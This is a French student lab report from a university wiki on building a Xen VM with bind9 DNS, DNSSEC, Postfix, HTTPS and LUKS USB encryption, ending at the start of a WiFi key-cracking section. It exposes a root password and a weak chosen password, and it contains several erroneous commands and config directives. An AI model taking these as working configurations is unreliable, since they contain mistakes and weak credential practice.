On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54003</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54003"/>
				<updated>2020-11-25T13:19:06Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Tableau Récapitulatif */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on tajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interfacte avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comem ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on resoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commance &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de gandi on resoit un codde de confimartion ainsi q'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers gandi a télechargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionn pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
